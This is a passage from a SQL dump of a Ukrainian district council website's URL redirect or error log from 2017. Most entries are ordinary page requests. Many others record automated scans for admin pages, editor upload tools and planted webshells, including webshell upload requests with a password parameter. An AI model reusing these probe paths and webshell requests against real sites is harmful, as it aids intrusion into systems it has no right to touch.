00:00:00',301),(30104,'http://www.malyn-rayrada.gov.ua/index.php/1331-vitaemo-iz-novim-2016-rokom?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2017-04-18 01:29:29','0000-00-00 00:00:00',301),(30105,'http://malyn-rayrada.gov.ua/index.php/1518-ksaverivska-silska-rada-informue',NULL,'','',30,0,'2017-04-18 05:31:59','0000-00-00 00:00:00',301),(30106,'http://malyn-rayrada.gov.ua/index.php/1129-z-dnem-konstitutsiji-ukrajini?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2017-04-18 09:44:23','0000-00-00 00:00:00',301),(30107,'http://malyn-rayrada.gov.ua/index.php/1565-komunalne-pidpriemstvo-akhplan-malinskoji-rajonnoji-radi-ogoloshue-pro-namir-peredati-nerukhome-majno-v-orendu',NULL,'','',31,0,'2017-04-18 15:28:49','0000-00-00 00:00:00',301),(30108,'http://malyn-rayrada.gov.ua/index.php/1129-z-dnem-konstitutsiji-ukrajini',NULL,'','',28,0,'2017-04-18 16:39:32','0000-00-00 00:00:00',301),(30109,'http://www.malyn-rayrada.gov.ua/index.php/1343-z-1-sichnya-startuvala-deklaratsijna-kampaniya-2016',NULL,'','',23,0,'2017-04-19 05:54:34','0000-00-00 00:00:00',301),(30110,'http://malyn-rayrada.gov.ua/index.php/1515-informatsiya-shchodo-roboti-kabelnogo-telebachennya-v-mikrorajoni-paperovoji-fabriki',NULL,'','',36,0,'2017-04-19 06:06:40','0000-00-00 00:00:00',301),(30111,'http://malyn-rayrada.gov.ua/attachments/article/1709/ріш змін Прог пож безп.pdf',NULL,'','',2,0,'2017-04-19 07:24:09','0000-00-00 00:00:00',301),(30112,'http://www.malyn-rayrada.gov.ua/index.php/1331-vitaemo-iz-novim-2016-rokom',NULL,'','',20,0,'2017-04-19 14:56:28','0000-00-00 00:00:00',301),(30113,'http://www.malyn-rayrada.gov.ua/index.php/1371-kajdasheva-sim-ya-u-vikonanni-artistiv-chopovitskoji-gromadi',NULL,'','',22,0,'2017-04-20 10:29:25','0000-00-00 00:00:00',301),(30114,'http://malyn-rayrada.gov.ua/index.php/1332-veselogo-rizdva',NULL,'','',37,0,'2017-04-20 12:36:13','0000-00-00 00:00:00',301),(30115,'http://www.malyn-rayrada.gov.ua/index.php/1451-ogoloshennya-shchodo-orendi',NULL,'','',26,0,'2017-04-20 21:18:14','0000-00-00 00:00:00',301),(30116,'http://www.malyn-rayrada.gov.ua/index.php/1565-komunalne-pidpriemstvo-akhplan-malinskoji-rajonnoji-radi-ogoloshue-pro-namir-peredati-nerukhome-majno-v-orendu',NULL,'','',24,0,'2017-04-20 23:22:29','0000-00-00 00:00:00',301),(30117,'http://malyn-rayrada.gov.ua/index.php/1343-z-1-sichnya-startuvala-deklaratsijna-kampaniya-2016',NULL,'','',36,0,'2017-04-21 00:35:36','0000-00-00 00:00:00',301),(30118,'http://www.malyn-rayrada.gov.ua/index.php/1464-rozpochato-viplatu-pensij-za-cherven?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2017-04-21 00:39:21','0000-00-00 00:00:00',301),(30119,'http://www.malyn-rayrada.gov.ua/index.php/1533-ogoloshennya-pro-shchodo-orendi-komunalnogo-majna?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2017-04-22 03:59:44','0000-00-00 00:00:00',301),(30120,'http://www.malyn-rayrada.gov.ua/index.php/1533-ogoloshennya-pro-shchodo-orendi-komunalnogo-majna',NULL,'','',25,0,'2017-04-24 07:47:13','0000-00-00 00:00:00',301),(30121,'http://malyn-rayrada.gov.ua/index.php/1451-ogoloshennya-shchodo-orendi',NULL,'','',29,0,'2017-04-24 21:08:39','0000-00-00 00:00:00',301),(30122,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1722-pro-priznachennya-direktora-komunalnogo-zakladu-tsentralna-rajonna-biblioteka-im-v-surativskogo-malinskoji-rajonnoji-radi',NULL,'','',12,0,'2017-04-26 17:34:41','0000-00-00 00:00:00',301),(30123,'http://www.malyn-rayrada.gov.ua/index.php/1534-pro-sklikannya-10-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',24,0,'2017-04-26 20:12:19','0000-00-00 00:00:00',301),(30124,'http://malyn-rayrada.gov.ua/templates/rada280317/wp-login.php',NULL,'','',2,0,'2017-04-28 17:30:42','0000-00-00 00:00:00',301),(30125,'http://malyn-rayrada.gov.ua/templates/rada280317/css/wp-login.php',NULL,'','',2,0,'2017-04-28 17:30:44','0000-00-00 00:00:00',301),(30126,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/wp-login.php',NULL,'','',2,0,'2017-04-28 17:30:46','0000-00-00 00:00:00',301),(30127,'http://malyn-rayrada.gov.ua/dede/login.php',NULL,'','',2,0,'2017-04-28 20:57:28','0000-00-00 00:00:00',301),(30128,'http://malyn-rayrada.gov.ua/shopadmin/index.php',NULL,'','',2,0,'2017-04-28 20:57:28','0000-00-00 00:00:00',301),(30129,'http://malyn-rayrada.gov.ua/11m.php',NULL,'','',2,0,'2017-04-28 20:57:28','0000-00-00 00:00:00',301),(30130,'http://malyn-rayrada.gov.ua/utility/convert/data/config.inc.php',NULL,'','',2,0,'2017-04-28 20:57:28','0000-00-00 00:00:00',301),(30131,'http://malyn-rayrada.gov.ua/ckfinder/ckfinder.html',NULL,'','',2,0,'2017-04-28 20:57:31','0000-00-00 00:00:00',301),(30132,'http://malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/2010-06-05-13-46-44/1436-informuyut-silski-ta-selishchni-radi?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2017-04-29 07:24:20','0000-00-00 00:00:00',301),(30133,'http://malyn-rayrada.gov.ua/8d30c1f4-833f-4674-95a5-2d3b03a64fd9',NULL,'','',1,0,'2017-04-29 08:20:20','0000-00-00 00:00:00',301),(30134,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1722-pro-priznachennya-direktora-komunalnogo-zakladu-tsentralna-rajonna-biblioteka-im-v-surativskogo-malinskoji-rajonnoji-radi',NULL,'','',4,0,'2017-04-29 17:54:24','0000-00-00 00:00:00',301),(30135,'http://www.malyn-rayrada.gov.ua/index.php/1129-z-dnem-konstitutsiji-ukrajini',NULL,'','',24,0,'2017-05-01 05:08:39','0000-00-00 00:00:00',301),(30136,'http://malyn-rayrada.gov.ua/system/fckeditor/editor/filemanager/connectors/uploadtest.html',NULL,'','',1,0,'2017-05-02 00:08:43','0000-00-00 00:00:00',301),(30137,'http://malyn-rayrada.gov.ua/attachments/article/1711/ð±ñ–ð±ð»ñ–ð¾ñ‚ðµðºð° ð¿ñ€ð¾ñ‚ð¾ðºð¾ð» 2.pdf',NULL,'','',2,0,'2017-05-02 04:26:16','0000-00-00 00:00:00',301),(30138,'http://www.malyn-rayrada.gov.ua/index.php/1471-sektor-organizatsijnoji-roboti-malinskoji-odpi-informue',NULL,'','',28,0,'2017-05-02 06:55:48','0000-00-00 00:00:00',301),(30139,'http://malyn-rayrada.gov.ua/attachments/article/1706/ð¿ñ€ð¾ñ‚ð¾ðºð¾ð» ð±ñ–ð±ð»ñ–ð¾ñ‚ðµðºð°.pdf',NULL,'','',2,0,'2017-05-02 08:23:58','0000-00-00 00:00:00',301),(30140,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/2010-06-05-13-46-44/1436-informuyut-silski-ta-selishchni-radi',NULL,'','',25,0,'2017-05-04 05:22:31','0000-00-00 00:00:00',301),(30141,'http://www.malyn-rayrada.gov.ua/system/fckeditor/editor/filemanager/connectors/uploadtest.html',NULL,'','',1,0,'2017-05-05 04:54:18','0000-00-00 00:00:00',301),(30142,'http://www.malyn-rayrada.gov.ua/shopadmin/index.php',NULL,'','',1,0,'2017-05-05 04:54:18','0000-00-00 00:00:00',301),(30143,'http://www.malyn-rayrada.gov.ua/11m.php',NULL,'','',1,0,'2017-05-05 04:54:19','0000-00-00 00:00:00',301),(30144,'http://www.malyn-rayrada.gov.ua/ckfinder/ckfinder.html',NULL,'','',1,0,'2017-05-05 04:54:19','0000-00-00 00:00:00',301),(30145,'http://www.malyn-rayrada.gov.ua/admin/fckeditor/editor/filemanager/connectors/uploadtest.html',NULL,'','',1,0,'2017-05-05 04:54:19','0000-00-00 00:00:00',301),(30146,'http://www.malyn-rayrada.gov.ua/dede/login.php',NULL,'','',1,0,'2017-05-05 04:54:19','0000-00-00 00:00:00',301),(30147,'http://www.malyn-rayrada.gov.ua/utility/convert/data/config.inc.php',NULL,'','',1,0,'2017-05-05 04:54:19','0000-00-00 00:00:00',301),(30148,'http://www.malyn-rayrada.gov.ua/fckeditor/editor/filemanager/connectors/uploadtest.html',NULL,'','',1,0,'2017-05-05 04:54:19','0000-00-00 00:00:00',301),(30149,'http://www.malyn-rayrada.gov.ua/attachments/article/1402/ðÿñ–ð´ñ ñƒð¼ðºð¸ ð²ñ–ð´ðºñ€ð¸ñ‚ð¾ð³ð¾ ð¿ð¾ñ–ð¼ðµð½ð½ð¾ð³ð¾ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ  25031016.pdf',NULL,'','',1,0,'2017-05-05 18:51:36','0000-00-00 00:00:00',301),(30150,'http://malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/2010-06-05-13-46-44/1436-informuyut-silski-ta-selishchni-radi',NULL,'','',32,0,'2017-05-05 18:53:57','0000-00-00 00:00:00',301),(30151,'http://malyn-rayrada.gov.ua/attachments/article/1431/ðÿñ–ð´ñ ñƒð¼ðºð¸ ð²ñ–ð´ðºñ€ð¸ñ‚ð¾ð³ð¾ ð¿ð¾ñ–ð¼ðµð½ð½ð¾ð³ð¾ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ .pdf',NULL,'','',1,0,'2017-05-05 19:10:10','0000-00-00 00:00:00',301),(30152,'http://www.malyn-rayrada.gov.ua/index.php/1464-rozpochato-viplatu-pensij-za-cherven',NULL,'','',24,0,'2017-05-07 00:38:15','0000-00-00 00:00:00',301),(30153,'http://malyn-rayrada.gov.ua/nhuig.php',NULL,'','',2,0,'2017-05-08 16:45:32','0000-00-00 00:00:00',301),(30154,'http://malyn-rayrada.gov.ua/attachments/article/1436/ð”ðµðºð»ð°ñ€ð°ñ†ñ–ñ— ñ ñ–ð»ñœñ ñœðºñ– ñ€ð°ð´ð¸1.pdf',NULL,'','',1,0,'2017-05-08 19:20:59','0000-00-00 00:00:00',301),(30155,'http://www.malyn-rayrada.gov.ua/index.php/1332-veselogo-rizdva',NULL,'','',21,0,'2017-05-09 13:19:00','0000-00-00 00:00:00',301),(30156,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1728-pro-zatverdzhennya-rozporyadzhennya-golovi-rajonnoji-derzhavnoji-administratsiji?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2017-05-11 20:10:23','0000-00-00 00:00:00',301),(30157,'http://www.malyn-rayrada.gov.ua/attachments/article/1444/ðÿñ–ð´ñ ñƒð¼ðºð¸ ð²ñ–ð´ðºñ€ð¸ñ‚ð¾ð³ð¾ ð¿ð¾ñ–ð¼ðµð½ð½ð¾ð³ð¾ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ _130516.pdf',NULL,'','',1,0,'2017-05-12 18:51:57','0000-00-00 00:00:00',301),(30158,'http://www.malyn-rayrada.gov.ua/wordpress/wp-login.php',NULL,'http://www.madtokens.com/wordpress/wp-login.php','',1,0,'2017-05-13 00:18:22','0000-00-00 00:00:00',301),(30159,'http://malyn-rayrada.gov.ua/attachments/article/1444/ðÿñ–ð´ñ ñƒð¼ðºð¸ ð²ñ–ð´ðºñ€ð¸ñ‚ð¾ð³ð¾ ð¿ð¾ñ–ð¼ðµð½ð½ð¾ð³ð¾ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ _130516.pdf',NULL,'','',1,0,'2017-05-13 19:10:06','0000-00-00 00:00:00',301),(30160,'http://www.malyn-rayrada.gov.ua/wp/wp-login.php',NULL,'http://www.madamelapresidente.fr/wp/wp-login.php','',1,0,'2017-05-13 22:09:08','0000-00-00 00:00:00',301),(30161,'http://www.malyn-rayrada.gov.ua/blog/wp-login.php',NULL,'http://www.lesainsetlesautres.com/blog/wp-login.php','',1,0,'2017-05-14 19:54:10','0000-00-00 00:00:00',301),(30162,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1728-pro-zatverdzhennya-rozporyadzhennya-golovi-rajonnoji-derzhavnoji-administratsiji',NULL,'','',38,0,'2017-05-15 00:28:24','0000-00-00 00:00:00',301),(30163,'http://malyn-rayrada.gov.ua/attachments/article/1402/ðÿñ–ð´ñ ñƒð¼ðºð¸ ð²ñ–ð´ðºñ€ð¸ñ‚ð¾ð³ð¾ ð¿ð¾ñ–ð¼ðµð½ð½ð¾ð³ð¾ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ  25031016.pdf',NULL,'','',1,0,'2017-05-15 19:35:47','0000-00-00 00:00:00',301),(30164,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1734-pro-vnesennya-zmin-do-pereliku-sotsialnikh-poslug-umov-ta-poryadku-jikh-nadannya-strukturnimi-pidrozdilami-teritorialnogo-tsentru-sotsialnogo-obslugovuvannya-nadannya-sotsialnikh-poslug-malinskogo-rajonu-zatverdzhennya-strukturi-ta-shtatnogo-rozpisu-teritorialnogo-tsentru-sotsialnogo-obslugovuvannya-nadannya-sotsialnikh-poslug-malinskogo-rajonu',NULL,'http://www.malyn-rayrada.gov.ua/index.php','',15,0,'2017-05-16 11:18:40','0000-00-00 00:00:00',301),(30165,'http://malyn-rayrada.gov.ua/images/1ndex.php?z3=mmwxufvqlnboca==&z4=l2ltywdlcy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:01:46','0000-00-00 00:00:00',301),(30166,'http://malyn-rayrada.gov.ua/sqlbak.php?z3=mmwxufvqlnboca==&z4=lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:01:54','0000-00-00 00:00:00',301),(30167,'http://malyn-rayrada.gov.ua/email.php?z3=mmwxufvqlnboca==&z4=lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:02:01','0000-00-00 00:00:00',301),(30168,'http://malyn-rayrada.gov.ua/functions.php?z3=mmwxufvqlnboca==&z4=lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:02:14','0000-00-00 00:00:00',301),(30169,'http://malyn-rayrada.gov.ua/cache/news.php?z3=mmwxufvqlnboca==&z4=l2nhy2hllw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:02:36','0000-00-00 00:00:00',301),(30170,'http://malyn-rayrada.gov.ua/tmp.php?z3=mmwxufvqlnboca==&z4=lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:02:47','0000-00-00 00:00:00',301),(30171,'http://malyn-rayrada.gov.ua/configurationbak.php?z3=mmwxufvqlnboca==&z4=lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:03:16','0000-00-00 00:00:00',301),(30172,'http://malyn-rayrada.gov.ua/robots.txt.php?z3=mmwxufvqlnboca==&z4=lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:03:25','0000-00-00 00:00:00',301),(30173,'http://malyn-rayrada.gov.ua/jconfig.php?z3=mmwxufvqlnboca==&z4=lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:03:42','0000-00-00 00:00:00',301),(30174,'http://malyn-rayrada.gov.ua/media/reads.php?z3=mmwxufvqlnboca==&z4=l21lzglhlw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:03:52','0000-00-00 00:00:00',301),(30175,'http://malyn-rayrada.gov.ua/media/1ndex.php?z3=mmwxufvqlnboca==&z4=l21lzglhlw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:04:05','0000-00-00 00:00:00',301),(30176,'http://malyn-rayrada.gov.ua/sql_dump.php?z3=mmwxufvqlnboca==&z4=lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:04:20','0000-00-00 00:00:00',301),(30177,'http://malyn-rayrada.gov.ua/images/laj.php?z3=mmwxufvqlnboca==&z4=l2ltywdlcy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:04:32','0000-00-00 00:00:00',301),(30178,'http://malyn-rayrada.gov.ua/images/stories/0day.php?z3=mmwxufvqlnboca==&z4=l2ltywdlcy9zdg9yawvzlw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:09:50','0000-00-00 00:00:00',301),(30179,'http://malyn-rayrada.gov.ua/includes/u2p.php?z3=mmwxufvqlnboca==&z4=l2luy2x1zgvzlw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:10:06','0000-00-00 00:00:00',301),(30180,'http://malyn-rayrada.gov.ua/images/xxx.php?z3=mmwxufvqlnboca==&z4=l2ltywdlcy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:10:17','0000-00-00 00:00:00',301),(30181,'http://malyn-rayrada.gov.ua/al277.php?z3=mmwxufvqlnboca==&z4=lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:10:36','0000-00-00 00:00:00',301),(30182,'http://malyn-rayrada.gov.ua/cache/cache_aqbmkwwx.php?z3=mmwxufvqlnboca==&z4=l2nhy2hllw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:10:48','0000-00-00 00:00:00',301),(30183,'http://malyn-rayrada.gov.ua/install.php?z3=mmwxufvqlnboca==&z4=lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:10:56','0000-00-00 00:00:00',301),(30184,'http://malyn-rayrada.gov.ua/dswat.org/wsdl.php?z3=mmwxufvqlnboca==&z4=l2rzd2f0lm9yzy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:11:03','0000-00-00 00:00:00',301),(30185,'http://malyn-rayrada.gov.ua/robot.php?z3=mmwxufvqlnboca==&z4=lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:11:19','0000-00-00 00:00:00',301),(30186,'http://malyn-rayrada.gov.ua/wsdl.php?z3=mmwxufvqlnboca==&z4=lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:11:27','0000-00-00 00:00:00',301),(30187,'http://malyn-rayrada.gov.ua/goog1es.php?z3=mmwxufvqlnboca==&z4=lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:11:35','0000-00-00 00:00:00',301),(30188,'http://malyn-rayrada.gov.ua/site/tmp/ctivrc.php?z3=mmwxufvqlnboca==&z4=l3npdguvdg1wlw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:11:52','0000-00-00 00:00:00',301),(30189,'http://malyn-rayrada.gov.ua/includes.php?z3=mmwxufvqlnboca==&z4=lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:12:04','0000-00-00 00:00:00',301),(30190,'http://malyn-rayrada.gov.ua/wp-main.php?z3=mmwxufvqlnboca==&z4=lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:12:19','0000-00-00 00:00:00',301),(30191,'http://malyn-rayrada.gov.ua/images/al277.php?z3=mmwxufvqlnboca==&z4=l2ltywdlcy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:12:48','0000-00-00 00:00:00',301),(30192,'http://malyn-rayrada.gov.ua/webconfig.txt.php?z3=mmwxufvqlnboca==&z4=lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:12:51','0000-00-00 00:00:00',301),(30193,'http://malyn-rayrada.gov.ua/cache/cachee.php?z3=mmwxufvqlnboca==&z4=l2nhy2hllw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:13:08','0000-00-00 00:00:00',301),(30194,'http://malyn-rayrada.gov.ua/thumb.php?z3=mmwxufvqlnboca==&z4=lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:13:26','0000-00-00 00:00:00',301),(30195,'http://malyn-rayrada.gov.ua/sessioncontroller.php?z3=mmwxufvqlnboca==&z4=lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:14:11','0000-00-00 00:00:00',301),(30196,'http://malyn-rayrada.gov.ua/maill.php?z3=mmwxufvqlnboca==&z4=lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:14:29','0000-00-00 00:00:00',301),(30197,'http://malyn-rayrada.gov.ua/error-log.php?z3=mmwxufvqlnboca==&z4=lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:14:52','0000-00-00 00:00:00',301),(30198,'http://malyn-rayrada.gov.ua/authenticating.php?z3=mmwxufvqlnboca==&z4=lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:15:10','0000-00-00 00:00:00',301),(30199,'http://malyn-rayrada.gov.ua/google-assist.php?z3=mmwxufvqlnboca==&z4=lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:15:24','0000-00-00 00:00:00',301),(30200,'http://malyn-rayrada.gov.ua/images/google-assist.php?z3=mmwxufvqlnboca==&z4=l2ltywdlcy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:15:31','0000-00-00 00:00:00',301),(30201,'http://malyn-rayrada.gov.ua/images/robots.txt.php?z3=mmwxufvqlnboca==&z4=l2ltywdlcy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:15:40','0000-00-00 00:00:00',301),(30202,'http://malyn-rayrada.gov.ua/elements.php?z3=mmwxufvqlnboca==&z4=lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:15:48','0000-00-00 00:00:00',301),(30203,'http://malyn-rayrada.gov.ua/xmlsrpc.php?z3=mmwxufvqlnboca==&z4=lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:16:02','0000-00-00 00:00:00',301),(30204,'http://malyn-rayrada.gov.ua/wp-cache.php?z3=mmwxufvqlnboca==&z4=lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:16:07','0000-00-00 00:00:00',301),(30205,'http://malyn-rayrada.gov.ua/images/404.php?z3=mmwxufvqlnboca==&z4=l2ltywdlcy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:16:20','0000-00-00 00:00:00',301),(30206,'http://malyn-rayrada.gov.ua/images/head.php?z3=mmwxufvqlnboca==&z4=l2ltywdlcy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:16:27','0000-00-00 00:00:00',301),(30207,'http://malyn-rayrada.gov.ua/cache/support.php?z3=mmwxufvqlnboca==&z4=l2nhy2hllw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:16:38','0000-00-00 00:00:00',301),(30208,'http://malyn-rayrada.gov.ua/roseleif.php?z3=mmwxufvqlnboca==&z4=lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:16:56','0000-00-00 00:00:00',301),(30209,'http://malyn-rayrada.gov.ua/abbrevsprl.php?z3=mmwxufvqlnboca==&z4=lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:17:08','0000-00-00 00:00:00',301),(30210,'http://malyn-rayrada.gov.ua/show.php?z3=mmwxufvqlnboca==&z4=lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:17:27','0000-00-00 00:00:00',301),(30211,'http://malyn-rayrada.gov.ua/images/defau1t.php?z3=mmwxufvqlnboca==&z4=l2ltywdlcy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:17:45','0000-00-00 00:00:00',301),(30212,'http://malyn-rayrada.gov.ua/configbak.php?z3=mmwxufvqlnboca==&z4=lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:23:00','0000-00-00 00:00:00',301),(30213,'http://malyn-rayrada.gov.ua/wp-data.php?z3=mmwxufvqlnboca==&z4=lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:23:12','0000-00-00 00:00:00',301),(30214,'http://malyn-rayrada.gov.ua/wp-content/plugins/fbrrchive.php?z3=mmwxufvqlnboca==&z4=l3dwlwnvbnrlbnqvcgx1z2lucy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:23:18','0000-00-00 00:00:00',301),(30215,'http://malyn-rayrada.gov.ua/wp-content/uploads/fbrrchive.php?z3=mmwxufvqlnboca==&z4=l3dwlwnvbnrlbnqvdxbsb2fkcy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:23:33','0000-00-00 00:00:00',301),(30216,'http://malyn-rayrada.gov.ua/wp-content/plugins/myshe.php?z3=mmwxufvqlnboca==&z4=l3dwlwnvbnrlbnqvcgx1z2lucy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:23:46','0000-00-00 00:00:00',301),(30217,'http://malyn-rayrada.gov.ua/wp-content/plugins/wp-cache.php?z3=mmwxufvqlnboca==&z4=l3dwlwnvbnrlbnqvcgx1z2lucy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:24:05','0000-00-00 00:00:00',301),(30218,'http://malyn-rayrada.gov.ua/wp-content/plugins/wp-footers.php?z3=mmwxufvqlnboca==&z4=l3dwlwnvbnrlbnqvcgx1z2lucy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:24:15','0000-00-00 00:00:00',301),(30219,'http://malyn-rayrada.gov.ua/wp-content/plugins/wpfootes.php?z3=mmwxufvqlnboca==&z4=l3dwlwnvbnrlbnqvcgx1z2lucy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:24:33','0000-00-00 00:00:00',301),(30220,'http://malyn-rayrada.gov.ua/wp-content/plugins/sql_dump.php?z3=mmwxufvqlnboca==&z4=l3dwlwnvbnrlbnqvcgx1z2lucy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:24:49','0000-00-00 00:00:00',301),(30221,'http://malyn-rayrada.gov.ua/wp-content/plugins/socketiontrol.php?z3=mmwxufvqlnboca==&z4=l3dwlwnvbnrlbnqvcgx1z2lucy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:24:54','0000-00-00 00:00:00',301),(30222,'http://malyn-rayrada.gov.ua/wp-content/plugins/socketiasrgasfontrol.php?z3=mmwxufvqlnboca==&z4=l3dwlwnvbnrlbnqvcgx1z2lucy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:25:05','0000-00-00 00:00:00',301),(30223,'http://malyn-rayrada.gov.ua/wp-content/plugins/analyser.php?z3=mmwxufvqlnboca==&z4=l3dwlwnvbnrlbnqvcgx1z2lucy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:25:23','0000-00-00 00:00:00',301),(30224,'http://malyn-rayrada.gov.ua/cache/list.php?z3=mmwxufvqlnboca==&z4=l2nhy2hllw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-05-16 14:25:34','0000-00-00 00:00:00',301),(30225,'http://malyn-rayrada.gov.ua/license.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:25:53','0000-00-00 00:00:00',301),(30226,'http://malyn-rayrada.gov.ua/tmp/sfx.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:25:54','0000-00-00 00:00:00',301),(30227,'http://malyn-rayrada.gov.ua/m.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:26:00','0000-00-00 00:00:00',301),(30228,'http://malyn-rayrada.gov.ua/ny.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:26:00','0000-00-00 00:00:00',301),(30229,'http://malyn-rayrada.gov.ua/tmp/guide.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:26:02','0000-00-00 00:00:00',301),(30230,'http://malyn-rayrada.gov.ua/media/jss.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:26:05','0000-00-00 00:00:00',301),(30231,'http://malyn-rayrada.gov.ua/nktt.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:26:11','0000-00-00 00:00:00',301),(30232,'http://malyn-rayrada.gov.ua/zibi.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:26:16','0000-00-00 00:00:00',301),(30233,'http://malyn-rayrada.gov.ua/u.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:26:18','0000-00-00 